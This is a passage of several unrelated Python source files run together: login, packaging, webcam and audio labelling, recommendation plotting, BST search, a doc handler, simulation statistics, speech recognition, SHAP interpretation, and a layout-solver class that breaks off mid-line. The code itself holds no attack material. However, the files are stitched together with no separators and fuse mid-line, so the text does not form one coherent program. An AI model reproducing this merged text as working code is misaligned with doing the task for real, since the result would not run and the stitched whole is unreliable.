ProvidedUsernameOrPasswordAreIncorrect: provided username or password are incorrect. :returns: dict(str access_token) :rtype: dict """ return authentication_services.login(username, password, InternalAuthenticatorEnum.ADMIN, **options) from setuptools import setup setup( name='flexio-flow', version='0.0.0', packages=['', 'tests', 'tests.Schemes', 'tests.Schemes.Package', 'tests.FlexioFlow', 'tests.FlexioFlow.Actions', 'utils', 'Schemes', 'Schemes.Maven', 'Schemes.Docker', 'Schemes.Package', 'Schemes.Composer', 'Exceptions', 'FlexioFlow', 'FlexioFlow.Actions', 'VersionControl', 'VersionControl.Git', 'VersionControl.Git.Branches', 'VersionControl.Git.Branches.Hotfix', 'VersionControl.Git.Branches.Release'], package_dir={'': 'src'}, url='http://flexio.fr', license='Apache License 2.0', author='thomas', author_email='', description='' ) VideoStream.py import cv2 # import sys import numpy as np import datetime # import time import pyaudio # from audiostream import * from store_data import data_handler def newAverageColorGrayscale(image): ''' Finds average color of an image's pixels input: image object from cv2 output: singel pixel value, would return 3 values if we were not doing grayscale ''' average_color_per_row = np.average(image, axis=0) average_color = np.average(average_color_per_row, axis=0) return average_color def callback(in_data, frame_count, time_info, flag): global b, a, fulldata, dry_data, frames audio_data = np.fromstring(in_data, dtype=np.float32) dry_data = np.append(dry_data, audio_data) fulldata = np.append(fulldata, audio_data) return (audio_data, pyaudio.paContinue) if __name__ == '__main__': # Initialize an input (no key creates a value of 255) cap = cv2.VideoCapture(0) user_input = cv2.waitKey(0) & 0xFF data_store = data_handler() moments = {} # data label dictionary label = {ord('b'): 'tool break', ord('d'): 'tool dull', ord('g'): 'machine okay', ord('n'): 'machine problem', ord('i'): 'machine idle', 255: 'No Entry'} running = "n" chunk = 1024 # fulldata = np.array([]) # dry_data = np.array([]) p = pyaudio.PyAudio() stream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=1024) # in_speech_bf = False # ##decoder.start_utt() # while True: # if stream.is_stopped(): # stream.start_stream() # buf = stream.read(1024) # if buf:q # stream.stop_stream() # decoder.process_raw(buf, False, False) # initialize average color for something to compare to average_color = 0 # from audiostream # tt = TapTester() counter = 0 run = True while run: # listen # audio = tt.listen() # read a frame from camera ret, image = cap.read() # show the picture cv2.imshow('image', image) # listen for keyboard input last_input = user_input user_input = cv2.waitKey(1) & 0xFF # quitting sequence if user_input == ord('q'): break # keep the last pressed key as label if user_input == 255 and last_input != 255: user_input = last_input # TODO: incorporate sound into the data package moments["audio"] = "aud" moments["image"] = image moments["timestamp"] = datetime.datetime.now() moments["label"] = label.get(user_input, None) moments['frame_width'] = cap.get(propId=3) moments['frame_height'] = cap.get(propId=4) # TODO: Incorporate BOTO streaming into data_handler program # data_store.write(moments) if counter > 30: run = False counter += 1 # Release the capture cap.release() cv2.destroyAllWindows() # for moment in moments: # print(moment.get('audio', 'Not Found')) HaoyueXU99/Data-Analysislectures/audio_feed_stream_recommendation/utils.py from sklearn import metrics import lightgbm as lgb from sklearn.model_selection import train_test_split import pandas as pd def auc(y,pre): fpr, tpr, thresholds = metrics.roc_curve(y, pre) auc=metrics.auc(fpr, tpr) return auc def getAmountLevel(t): if t<=10: return 1 elif t<=100: return 2 else: return 3 def time_cut(t): if t<=0: return ['0',1] elif t<=3: return ['(0,3])',2] elif t<=14: return ['(3,14])',3] elif t<=90: return ['(14,90])',4] elif t<=180: return ['(90,180])',5] else: return ['>180',6] def fans_cut(t): if t<10: return 1 elif t<67: return 2 elif t<348: return 3 else: return 4 import matplotlib.pyplot as plt import matplotlib as mpl def draw1(data,fea_values,fea,ylim_value=0): x = fea_values y = data[data.label==0][[fea,'label']].groupby([fea]).count().reset_index().label.values y1 = data[data.label==1][[fea,'label']].groupby([fea]).count().reset_index().label.values plt.xlabel(fea+" gift count") plt.legend() plt.bar(x, y, align="center", color="c", tick_label=fea_values, label="click=0") plt.bar(x, y1, align="center", bottom=y, color="g", label="click=1") value=780000 if ylim_value!=0: value=ylim_value plt.ylim(0, value) plt.show() def draw2(data,fea_values,fea,ascending_value): ##柱状图 import matplotlib.pyplot as plt import numpy as np from matplotlib import pyplot as plt fig,ax=plt.subplots() # 生成数据 #x = np.linspace(0, 20, 20) tmp=data[fea_values+['label','user_id']].groupby(fea_values+['label']).count().reset_index()\ .sort_values(by=[fea_values[1]],ascending=0)[[fea_values[0],'label','user_id']] tmp=pd.pivot_table(tmp,index=fea_values[0],columns=['label']) #newtmp=tmp.T[['>180','(90,180])','(14,90])', '(3,14])','(0,3])','0']] newtmp=tmp.T[['0','(0,3])', '(3,14])','(14,90])','(90,180])','>180']] if(ascending_value==True): newtmp=tmp.T[['>180','(90,180])','(14,90])', '(3,14])','(0,3])','0']] col=[i for i in newtmp] #年份从header中提取 value=newtmp.T.values #将冠亚季军所吃热狗的数量转化成matrix,也就是[[25,24,22],[50.0,31.0,23.5],...] value=value[np.lexsort(value[:,::-1].T)] v1=[i[0]+i[1] for i in value] #第一次画的柱形图y值为冠亚季军所吃热狗数量的总和 v2=[i[0] for i in value] #第二次画的柱形图y值为亚军所吃热狗的数量+季军所吃热狗的数量 #v1.sort(reverse=ascending_value) #v2.sort(reverse=ascending_value) ax.barh(col,v1,color="g") ax.barh(col,v2,color="c") ax.set(xlabel=fea,title=fea+" gift count") #ax.text(1998,184,"(HDB)") #设置文字 ax.legend(["click=1","click=0"]) #设置图例 plt.show() """ # Average: O(log(N)) time (because of searching or removal algorithms) | O(log(N)) space(N frames were used on the call stack) or o(D) space where D is depth of the branch # if used iteratively space complexity becomes O(1)- won't be using the frames on the call stack # Worst: O(N) time| (when BST has only 1 branch) | (N) space # if used iteratively space complexity becomes O(1) BST has 1 branch ONLY 10 | 15 | 22 | 30 find closest value to 12 10 / \ 5 15 / \ / \ 2 5 13 22 / / \ 1 None 14 assigning the variable 'closest = inifinity'(best candidate for the closest value) abs value = rootValue(which is currentNode) - targetValue(12) = |absoluteDifference| if the |absoluteDifference| b/w infinty and targetValue && rootValue(which is currentNode) and targetValue is less then, value gets updated with the least differnce to the targetValue |infinity - 12| = infinity |10 - 12| = 2 if infinity < 2: # obviously NO therefore- 10(currentNode) is closer to 12(targetValue) than infinity closer to 12 Hence, closest value gets updated in the variable to the currentNode -> closest = 10 which means right side of the 10(rootValue) >= 12(targetValue) because we are in BST AND left side of 10 <= 12 (Don't have to explore and gets ignored) Next value is 15 so, |15(currentNode) - 12(targetValue)| = 3 vs |10(rootNode)/(closest - assigned variable) - 12(targetValue)| = 2 |15 - 12| = 3 vs |10 - 12| = 2 since, 3(absolute difference of 15) > 2(absolute difference of 10) which means 15 is farthest away from 10 therefore, we don't update the closestValue - which will remain 'closest = 10' Next Value = 22 gets eliminated because it's greater than 15(which makes the absoluteDifference further away from 15's absoluteDifference) # on average that eliminates, half of the BST Next Value = 13 |13-12| = 1 vs |10-12| = 2 so, 1 < 2 therefore, 'closest = 1' (value gets updated) Also, 12(currentValue) < 13(closest value) -> therefore, it elminates any other nodes beyond 13(which is 14 in our case) and also find if there is any other Node(Null or has value) -> Answer is 13 Edge Case to make it optimal if the |currentValue - targetValue| = 0 -> hence you found the closestValue (STOP HERE) and 'closest = *updatedValue*' gets updated """ # Average: O(log(n)) time | O(log(n)) space # Worst: O(n) time | O(n) space def findClosestValueInBst(tree, target): return findClosestValueInBstHelper(tree, target, tree.value) # tree.value = float("inf") infinity def findClosestValueInBstHelper(tree, target, closest): if tree is None: # Recursive base case - where the currentNode is NULL return closest if abs(target - closest) > abs(target - tree.value): closest = tree.value # closest value gets updated if target < tree.value: # if target < tree.value(CurrentNode) # then, ONLY explore left subtree return findClosestValueInBstHelper(tree.left, target, closest) elif target > tree.value: # if target > tree.value(CurrentNode) # then, ONLY explore right subtree return findClosestValueInBstHelper(tree.right, target, closest) else: return closest # This is the class of the input tree. Do not edit. class BST: def __init__(self, value): self.value = value self.left = None self.right = None # Average: O(log(n)) time | O(1) space # Worst: O(n) time | O(1) space def findClosestValueInBst(tree, target): return findClosestValueInBstHelper(tree, target, tree.value) # tree.value = float("inf") infinity def findClosestValueInBstHelper(tree, target, closest): currentNode = tree while currentNode is not None: if abs(target- closest) > abs(target - currentNode.value): closest = currentNode.value if target < currentNode.value: currentNode = currentNode.left elif target > currentNode.value: currentNode = currentNode.right else: break return closest # This is the class of the input tree. Do not edit. class BST: def __init__(self, value): self.value = value self.left = None self.right = Noneimport markdown import io import os.path from .base_handler import BaseHandler class DocHandler(BaseHandler): docbase = os.path.realpath( os.path.join(os.path.dirname(__file__), '..', 'doc-src') ) def get(self, slug): buffer = io.BytesIO() if slug is not None: slug = slug.replace('/', '') if slug not in ('ruby', 'python', 'javascript', 'quickref'): self.redirect('/doc/javascript') else: doc = slug markdown.markdownFromFile( os.path.join(self.docbase, doc + '.md'), buffer, extensions=['markdown.extensions.fenced_code', 'markdown.extensions.toc'], extension_configs={ 'markdown.extensions.toc': { 'title': 'Tabla de contenidos', }, }, ) buffer.seek(0) self.render('container.html', body=buffer.read()) #!/usr/bin/env python import torch from torchvision.transforms.functional import to_tensor import numpy import PIL.Image as Image import tqdm from torch_scatter import scatter_add from ltron.gym.standard_envs import graph_supervision_env from ltron.torch.gym_tensor import ( gym_space_to_tensors, gym_space_list_to_tensors, graph_to_gym_space) from ltron.gym.brick_env import async_brick_env if __name__ == '__main__': num_processes = 8 train_dataset = 'rando_micro_wheels' train_split = 'all' train_subset = None segmentation_width, segmentation_height = 64, 64 multi_hide = True max_instances_per_step = 8 randomize_viewpoint = True randomize_colors = True train_env = async_brick_env( num_processes, graph_supervision_env, dataset=train_dataset, split=train_split, subset=train_subset, load_scenes=True, dataset_reset_mode='multi_pass', segmentation_width = segmentation_width, segmentation_height = segmentation_height, randomize_viewpoint=randomize_viewpoint, randomize_viewpoint_frequency='reset', randomize_colors=randomize_colors) num_steps = 1000 instance_pixel_data = {} instance_z_data = {} step_observations = train_env.reset() for i in tqdm.tqdm(range(num_steps//num_processes)): step_tensors = gym_space_to_tensors( step_observations, train_env.single_observation_space, image_transform=to_tensor) seg = step_tensors['segmentation_render'] instance_pixel_counts = scatter_add( torch.ones_like(seg).view(num_processes, -1), seg.view(num_processes, -1)) for b in range(num_processes): save_frame = False for j in range(instance_pixel_counts.shape[-1]): if instance_pixel_counts[b,j] == 0: continue instance_label = int(( step_tensors['graph_label'][b]['instance_label'][j])) if instance_label == 0: continue if instance_label not in instance_pixel_data: instance_pixel_data[instance_label] = [] instance_z_data[instance_label] = [] instance_pixel_data[instance_label].append( instance_pixel_counts[b,j]) z = -step_tensors['brick_position']['camera'][b,j,2] instance_z_data[instance_label].append(z) ''' if z > 700 or z < 200: save_frame = True if z > 700: print('far', i, b) else: print('near', i, b) ''' ''' if save_frame: image = step_tensors['color_render'][b].cpu().numpy() * 255 image = numpy.moveaxis(image,0,2) image = image.astype(numpy.uint8) Image.fromarray(image).save('tmp_%i_%i.png'%(i,b)) ''' step_observations = train_env.reset() print('Class: instance density, min p, max p, avg p, min z, max z, avg z') total_instances = sum([len(v) for v in instance_pixel_data.values()]) min_all_z = float('inf') max_all_z = -float('inf') for class_label in sorted(instance_pixel_data.keys()): num_instances = len(instance_pixel_data[class_label]) instance_density = num_instances/total_instances min_pixels = min(instance_pixel_data[class_label]) max_pixels = max(instance_pixel_data[class_label]) avg_pixels = sum(instance_pixel_data[class_label])/num_instances min_z = min(instance_z_data[class_label]) max_z = max(instance_z_data[class_label]) avg_z = sum(instance_z_data[class_label])/num_instances print(' %i: %.04f, %i, %i, %i, %.02f, %.02f, %.02f'%( class_label, instance_density, min_pixels, max_pixels, avg_pixels, min_z, max_z, avg_z)) min_all_z = min(min_all_z, min_z) max_all_z = max(max_all_z, max_z) print('Min/Max Z: %.02f, %.02f'%(min_all_z, max_all_z)) MasayukiTanaka0412/Shikibu import speech_recognition as sr import os import sys import datetime AUDIO_FILE = sys.argv[1] LANGUAGE = sys.argv[2] #AUDIO_FILE = "out001.wav" #LANGUAGE = "ja-JP" print("AUDIOFILE = {}".format(AUDIO_FILE)) print("LANGUAGE = {}".format(LANGUAGE)) # recognize speech using Microsoft Azure Speech AZURE_SPEECH_KEY = os.environ['AZURE_SPEECH_KEY'] # use the audio file as the audio source r = sr.Recognizer() offset =0 print("Recognition Result") with sr.AudioFile(AUDIO_FILE) as source: while offset < source.DURATION: audio = r.record(source,duration=60) # read the entire audio file print("{} - {} ".format(datetime.timedelta(seconds=offset), datetime.timedelta(seconds=offset +60))) offset = offset + 60 try: result = r.recognize_azure(audio, key=AZURE_SPEECH_KEY,location="japaneast",language=LANGUAGE,show_all=False,result_format="simple",profanity="raw") print(result) except sr.UnknownValueError: print("Microsoft Azure Speech could not understand audio") except sr.RequestError as e: print("Could not request results from Microsoft Azure Speech service; {0}".format(e)) print("End of Recognition")from numpy.lib.npyio import save from pandas.core import base from pandas.core.series import Series from pandas.io import feather_format import shap from tensorflow.keras.models import Model from lightgbm import LGBMClassifier import pandas as pd import matplotlib.pyplot as plt from ..util.util import basename, filename_subfix class ShapInterpreter(object): def __init__(self, model, background_data, schema, preprocess_dict={}): """ShapInterpreter Parameters ---------- model : LGBMClassifier or tf.keras.models.Model model to be interpreted background_data : pd.DataFrame background data used in the evaluation schema : dict description of the data preprocess_dict : dict, optional preprocessors of the model, by default {} """ if background_data is not None: if schema["label"] in background_data: background_data = background_data.drop(schema["label"], axis=1) if isinstance(model, Model): if background_data is None: raise Exception( "background_data must not be None for Keras Model") def f(X): return model.predict([X[:, i] for i in range(X.shape[1])]).flatten() self.predict = f self.explainer = shap.KernelExplainer(f, background_data) self.type = "kernel" elif isinstance(model, LGBMClassifier): self.explainer = shap.TreeExplainer(model) self.type = "lgb" self.background_data = background_data self.schema = schema self.preprocess_dict = preprocess_dict def _cal_shap_value(self, df, nsamples=500, use_background=True): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) if isinstance(df, pd.Series): for col in df.index: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col][ "processor"].transform([str(df[col])])[0] else: df[col] = self.preprocess_dict[col][ "processor"].transform(df[col].reshape( (-1, 1)))[0][0] df = pd.to_numeric(df) else: for col in df.columns: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col]["processor"].transform( df[col].astype(str)) else: df[col] = self.preprocess_dict[col]["processor"].transform( df[[col]]) if self.type == "kernel": if isinstance(df, pd.Series): shap_values = self.explainer.shap_values(df, nsamples=nsamples) else: if use_background: shap_values = self.explainer.shap_values(df, nsamples=nsamples) else: explainer = shap.KernelExplainer(self.predict, df) shap_values = explainer.shap_values(df, nsamples=nsamples) return shap_values, df elif self.type == "lgb": if isinstance(df, pd.Series): df = df.to_frame().transpose() use_background = True if self.background_data is None: raise Exception( "for one point shap_value, the background_data is required!" ) if self.background_data is not None and use_background: df_all = pd.concat([df, self.background_data], axis=0) shap_values = self.explainer.shap_values(df_all) else: shap_values = self.explainer.shap_values(df) return shap_values[1][:df.shape[0]], df def _explainer(self, df, nsamples=500, use_background=True): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) if isinstance(df, pd.Series): for col in df.index: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col][ "processor"].transform([str(df[col])])[0] else: df[col] = self.preprocess_dict[col][ "processor"].transform(df[col].reshape( (-1, 1)))[0][0] df = pd.to_numeric(df) else: for col in df.columns: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col]["processor"].transform( df[col].astype(str)) else: df[col] = self.preprocess_dict[col]["processor"].transform( df[[col]]) if self.type == "kernel": if isinstance(df, pd.Series): shap_values = self.explainer(df, nsamples=nsamples) else: if use_background: shap_values = self.explainer(df, nsamples=nsamples) else: explainer = shap.KernelExplainer(self.predict, df) shap_values = explainer(df, nsamples=nsamples) return shap_values elif self.type == "lgb": if isinstance(df, pd.Series): df = df.to_frame().transpose() use_background = True if self.background_data is None: raise Exception( "for one point shap_value, the background_data is required!" ) if self.background_data is not None and use_background: df_all = pd.concat([df, self.background_data], axis=0) shap_values = self.explainer(df_all) else: shap_values = self.explainer(df) return shap_values[1] def cal_shap_value(self, df, nsamples=500, use_background=True): """calculate the shap values of one point of several points Parameters ---------- df : pd.Series or pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 use_background : bool, optional if use the background data, for one point, it must be True, by default True Returns ------- pd.DataFrame shap values of one point of several points """ shap_value, _ = self._cal_shap_value(df, nsamples=nsamples, use_background=use_background) if len(shap_value.shape) == 1: return pd.DataFrame(shap_value.reshape(1, len(shap_value)), columns=[ col for col in df.index if col != self.schema['label'] ]) else: return pd.DataFrame(shap_value, columns=[ col for col in df.columns if col != self.schema['label'] ]) def force_plot(self, df, nsamples=500, savefig=None, use_background=True): """plot the shap values of one point of several points Parameters ---------- df : pd.Series or pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 savefig : string, optional path to save the fig, by default None use_background : bool, optional if use the background data, for one point, it must be True, by default True """ # assert isinstance(df, pd.Series) if isinstance(df, pd.DataFrame): ins = df.shape[0] if ins == 1: self.force_plot(df.iloc[0, :], nsamples=nsamples, savefig=savefig, use_background=use_background) else: if savefig is None: for i in range(ins): self.force_plot(df.iloc[i, :], nsamples=nsamples, savefig=savefig, use_background=use_background) else: filen, subfix = filename_subfix(savefig) subfix = ".{}".format(subfix) if subfix != "" else "" for i in range(ins): self.force_plot(df.iloc[i, :], nsamples=nsamples, savefig="{}_{}{}".format( filen, i, subfix), use_background=use_background) elif isinstance(df, pd.Series): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, _ = self._cal_shap_value(df, nsamples, use_background=use_background) if savefig is not None: plt.clf() if self.type == "kernel": shap.force_plot(self.explainer.expected_value, shap_values, df, matplotlib=True, show=False) elif self.type == "lgb": shap.force_plot(self.explainer.expected_value[1], shap_values, df, matplotlib=True, show=False) if savefig is None: plt.show() if savefig is not None: plt.savefig(savefig, dpi=150, bbox_inches='tight') else: raise ("Unsupported input type {}".format(type(df))) def summary_plot(self, df, nsamples=500, savefig=None, use_background=True, plot_type=None): """plot the summary of the shap values of the model Parameters ---------- df : pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 savefig : string, optional path to save the fig, by default None use_background : bool, optional if use the background data, for one point, it must be True, by default True plot_type : “dot” (default for single output), “bar” (default for multi-output), “violin”, or “compact_dot”. What type of summary plot to produce. Note that “compact_dot” is only used for SHAP interaction values. """ if isinstance(df, pd.Series) or df.shape[0] == 1: self.force_plot(df, nsamples, savefig=savefig, use_background=use_background) else: df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, _ = self._cal_shap_value(df, nsamples, use_background=use_background) if savefig is not None: plt.clf() shap.summary_plot(shap_values, df, show=False, plot_type=plot_type) if savefig is None: plt.show() if savefig is not None: plt.savefig(savefig, dpi=150, bbox_inches='tight') def dependence_plot(self, df, feature_name=None, nsamples=500, savefig=None, use_background=True): assert isinstance(df, pd.DataFrame) and df.shape[0] > 1 df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, preprocess_df = self._cal_shap_value(df, nsamples, use_background=use_background) if feature_name is None: for col in df.columns: shap.dependence_plot(col, shap_values, preprocess_df, display_features=df) else: if isinstance(feature_name, str): shap.dependence_plot(feature_name, shap_values, preprocess_df, display_features=df) elif isinstance(feature_name, (list, tuple)): for col in feature_name: shap.dependence_plot(col, shap_values, preprocess_df, display_features=df)""" Conventions: "constrain_x" means to constrain the variable with either another kiwisolver variable, or a float. i.e. `constrain_width(0.2)` will set a constraint that the width has to be 0.2 and this constraint is permanent - i.e. it will not be removed if it becomes obsolete. "edit_x" means to set x to a value (just a float), and that this value can change. So `edit_width(0.2)` will set width to be 0.2, but `edit_width(0.3)` will allow it to change to 0.3 later. Note that these values are still just "suggestions" in `kiwisolver` parlance, and could be over-ridden by other constrains. """ import itertools import kiwisolver as kiwi import logging import numpy as np _log = logging.getLogger(__name__) # renderers can be complicated def get_renderer(fig): if fig._cachedRenderer: renderer = fig._cachedRenderer else: canvas = fig.canvas if canvas and hasattr(canvas, "get_renderer"): renderer = canvas.get_renderer() else: # not sure if this can happen # seems to with PDF... _log.info("constrained_layout : falling back to Agg renderer") from matplotlib.backends.backend_agg import FigureCanvasAgg canvas = FigureCanvasAgg(fig) renderer = canvas.get_renderer() return renderer class LayoutBox: """ Basic rectangle representation using kiwi solver variables """ def __init__(self, parent=None, name='', tightwidth=False, tightheight=False, artist=None, lower_left=(0, 0), upper_right=(1, 1), pos=False, subplot=False, h_pad=None, w_pad=None): Variable = kiwi.Variable self.parent = parent self.name = name sn = self.name + '_' if parent is None: self.solver = kiwi.Solver() self.constrained_layout_called = 0 else: self.solver = parent.solver self.constrained_layout_called = None # parent wants to know about this child! parent.add_child(self) # keep track of artist associated w/ this layout. Can be none self.artist = artist # keep track if this box is supposed to be a pos that is constrained # by the parent. self.pos = pos # keep track of whether we need to match this subplot up with others. self.subplot = subplot self.top = Variable(sn + 'top') self.bottom = Variable(sn + 'bottom') self.left = Variable(sn + 'left') self.right = Variable(sn + 'right') self.width = Variable(sn + 'width') self.height = Variable(sn + 'height') self.h_center = Variable(sn + 'h_center') self.v_center = Variable(sn + 'v_center') self.min_width = Variable(sn + 'min_width') self.min_height = Variable(sn + 'min_height') self.pref_width = Variable(sn + 'pref_width') self.pref_height = Variable(sn + 'pref_height') # margins are only used for axes-position layout boxes. maybe should # be a separate subclass: self.left_margin = Variable(sn + 'left_margin') self.right_margin = Variable(sn + 'right_margin') self.bottom_margin = Variable(sn + 'bottom_margin') self.top_margin = Variable(sn + 'top_margin') # mins self.left_margin_min = Variable(sn + 'left_margin_min') self.right_margin_min = Variable(sn + 'right_margin_min') self.bottom_margin_min = Variable(sn + 'bottom_margin_min') self.top_margin_min = Variable(sn + 'top_margin_min') right, top = upper_right left, bottom = lower_left self.tightheight = tightheight self.tightwidth = tightwidth self.add_constraints() self.children = [] self.subplotspec = None if self.pos: self.constrain_margins() self.h_pad = h_pad self.w_pad = w_pad def constrain_margins(self): """ Only do this for pos. This sets a variable distance margin between the position of the axes and the outer edge of the axes. Margins are variable because they change with the figure size. Margin minimums are set to make room for axes decorations. However, the margins can be larger if we are mathicng the position size to other axes. """ sol = self.solver # left if not sol.hasEditVariable(self.left_margin_min): sol.addEditVariable(self.left_margin_min, 'strong') sol.suggestValue(self.left_margin_min, 0.0001) c = (self.left_margin == self.left - self.parent.left) self.solver.addConstraint(c | 'required') c = (self.left_margin >= self.left_margin_min) self.solver.addConstraint(c | 'strong') # right if not sol.hasEditVariable(self.right_margin_min): sol.addEditVariable(self.right_margin_min, 'strong') sol.suggestValue(self.right_margin_min, 0.0001) c = (self.right_margin == self.parent.right - self.right) self.solver.addConstraint(c | 'required') c = (self.right_margin >= self.right_margin_min) self.solver.addConstraint(c | 'required') # bottom if not sol.hasEditVariable(self.bottom_margin_min): sol.addEditVariable(self.bottom_margin_min, 'strong') sol.suggestValue(self.bottom_margin_min, 0.0001) c = (self.bottom_margin == self.bottom - self.parent.bottom) self.solver.addConstraint(c | 'required') c = (self.bottom_margin >= self.bottom_margin_min) self.solver.addConstraint(c | 'required') # top if not sol.hasEditVariable(self.top_margin_min): sol.addEditVariable(self.top_margin_min, 'strong') sol.suggestValue(self.top_margin_min, 0.0001) c = (self.top_margin == self.parent.top - self.top) self.solver.addConstraint(c | 'required') c = (self.top_margin >= self.top_margin_min) self.solver.addConstraint(c | 'required') def add_child(self, child): self.children += [child] def remove_child(self, child): try: self.children.remove(child) except ValueError: _log.info("Tried to remove child that doesn't belong to parent") def add_constraints(self): sol = self.solver # never let width and height go negative. for i in [self.min_width, self.min_height]: sol.addEditVariable(i, 1e9) sol.suggestValue(i, 0.0) # define relation ships between things thing width and right and left self.hard_constraints() # self.soft_constraints() if self.parent: self.parent_constrain() # sol.updateVariables() def parent_constrain(self): parent = self.parent hc = [self.left >= parent.left, self.bottom >= parent.bottom, self.top <= parent.top, self.right <= parent.right] for c in hc: self.solver.addConstraint(c | 'required') def hard_constraints(self): hc = [self.width == self.right - self.left, self.height == self.top - self.bottom, self.h_center == (self.left + self.right) * 0.5, self.v_center == (self.top + self.bottom) * 0.5, self.width >= self.min_width, self.height >= self.min_height] for c in hc: self.solver.addConstraint(c | 'required') def soft_constraints(self): sol = self.solver if self.tightwidth: suggest = 0. else: suggest = 20. c = (self.pref_width == suggest) for i in c: sol.addConstraint(i | 'required') if self.tightheight: suggest = 0. else: suggest = 20. c = (self.pref_height == suggest) for i in c: sol.addConstraint(i | 'required') c = [(self.width >= suggest), (self.height >= suggest)] for i in c: sol.addConstraint(i | 150000) def set_parent(self, parent): """Replace the parent of this with the new parent.""" self.parent = parent self.parent_constrain() def constrain_geometry(self, left, bottom, right, top, strength='strong'): hc = [self.left == left, self.right == right, self.bottom == bottom, self.top == top] for c in hc: self.solver.addConstraint(c | strength) # self.solver.updateVariables() def constrain_same(self, other, strength='strong'): """ Make the layoutbox have same position as other layoutbox """ hc = [self.left == other.left, self.right == other.right, self.bottom == other.bottom, self.top == other.top] for c in hc: self.solver.addConstraint(c | strength) def constrain_left_margin(self, margin, strength='strong'): c = (self.left == self.parent.left + margin) self.solver.addConstraint(c | strength) def edit_left_margin_min(self, margin): self.solver.suggestValue(self.left_margin_min, margin) def constrain_right_margin(self, margin, strength='strong'): c = (self.right == self.parent.right - margin) self.solver.addConstraint(c | strength) def edit_right_margin_min(self, margin): self.solver.suggestValue(self.right_margin_min, margin) def constrain_bottom_margin(self, margin, strength='strong'): c = (self.bottom == self.parent.bottom + margin) self.solver.addConstraint(c | strength) def edit_bottom_margin_min(self, margin): self.solver.suggestValue(self.bottom_margin_min, margin) def constrain_top_margin(self, margin, strength='strong'): c = (self.top == self.parent.top - margin) self.solver.addConstraint(c | strength) def edit_top_margin_min(self, margin): self.solver.suggestValue(self.top_margin_min, margin) def get_rect(self): return (self.left.value(), self.bottom.value(), self.width.value(), self.height.value()) def update_variables(self): """ Update *all* the variables that are part of the solver this LayoutBox is created with. """ self.solver.updateVariables() def edit_height(self, height, strength='strong'): """ Set the height of the layout box. This is done as an editable variable so that the value can change due to resizing. """ sol = self.solver for i in [self.height]: if not sol.hasEditVariable(i): sol.addEditVariable(i, strength) sol.suggestValue(self.height, height) def constrain_height(self, height, strength='strong'): """ Constrain the height of the layout box. height is either a float or a layoutbox.height. """ c = (self.height == height) self.solver.addConstraint(c | strength) def constrain_height_min(self, height, strength='strong'): c = (self.height >= height) self.solver.addConstraint(c | strength) def edit_width(self, width, strength='strong'): sol = self.solver for i in [self.width]: if not sol.hasEditVariable(i): sol.addEditVariable(i, strength) sol.suggestValue(self.width, width) def constrain_width(self, width, strength='strong'): """ Constrain the width of the layout box. *width* is either a float or a layoutbox.width. """ c = (self.width == width) self.solver.addConstraint(c | strength) def constrain_width_min(self, width, strength='strong'): c = (self.width >= width) self.solver.addConstraint(c | strength) def constrain_left(self, left, strength='strong'): c = (self.left == left) self.solver.addConstraint(c | strength) def constrain_bottom(self, bottom, strength='strong'): c = (self.bottom == bottom) self.solver.addConstraint(c | strength) def constrain_right(self, right, strength='strong'): c = (self.right == right) self.solver.addConstraint(c | strength) def constrain_top(self, top, strength='strong'): c = (self.top == top) self.solver.addConstraint(c | strength) def _is_subplotspec_layoutbox(self): """ Helper to check if this layoutbox is the layoutbox of a subplotspec. """ name = self.name.split('.')[-1] return name[:2] == 'ss' def _is_gridspec_layoutbox(self): """ Helper to check if this layoutbox is the layoutbox of a gridspec. """ name = self.name.split('.')[-1] return name[:8] == 'gridspec' def find_child_subplots(self): """ Find children of this layout box that are subplots. We want to line poss up, and this is an easy way to find them all. """ if self.subplot: subplots = [self] else: subplots = [] for child in self.children: subplots += child.find_child_subplots() return subplots def layout_from_subplotspec(self, subspec, name='', artist=None, pos=False): """ Make a layout box from a subplotspec. The layout box is constrained to be a fraction of the width/height of the parent, and be a fraction of the parent width/height from the left/bottom of the parent. Therefore the parent can move around and the layout for the subplot spec should move with it. The parent is *usually* the gridspec that made the subplotspec.?? """ lb = LayoutBox(parent=self, name=name, artist=artist, pos=pos) gs = subspec.get_gridspec() nrows, ncols = gs.get_geometry() parent = self.parent # OK, now, we want to set the position of this subplotspec # based on its subplotspec parameters. The new gridspec will inherit # from gridspec. prob should be new method in gridspec left = 0.0 right = 1.0 bottom = 0.0 top = 1.0 totWidth = right-left totHeight = top-bottom hspace = 0. wspace = 0. # calculate accumulated heights of columns cellH = totHeight / (nrows + hspace * (nrows - 1)) sepH = hspace * cellH if gs._row_height_ratios is not None: netHeight = cellH * nrows tr = sum(gs._row_height_ratios) cellHeights = [netHeight * r / tr for r in gs._row_height_ratios] else: cellHeights = [cellH] * nrows sepHeights = [0] + ([sepH] * (nrows - 1)) cellHs = np.cumsum(np.column_stack([sepHeights, cellHeights]).flat) # calculate accumulated widths of rows cellW = totWidth / (ncols + wspace * (ncols - 1)) sepW = wspace * cellW if gs._col_width_ratios is not None: netWidth = cellW * ncols tr = sum(gs._col_width_ratios) cellWidths = [netWidth * r / tr for r in gs._col_width_ratios] else: cellWidths = [cellW] * ncols sepWidths = [0] + ([sepW] * (ncols - 1)) cellWs = np.cumsum(np.column_stack([sepWidths, cellWidths]).flat) figTops = [top - cellHs[2 * rowNum] for rowNum in range(nrows)] figBottoms = [top - cellHs[2 * rowNum + 1] for rowNum in range(nrows)] figLefts = [left + cellWs[2 * colNum] for colNum in range(ncols)] figRights = [left + cellWs[2 * colNum + 1] for colNum in range(ncols)] rowNum1, colNum1 = divmod(subspec.num1, ncols) rowNum2, colNum2 = divmod(subspec.num2, ncols) figBottom = min(figBottoms[rowNum1], 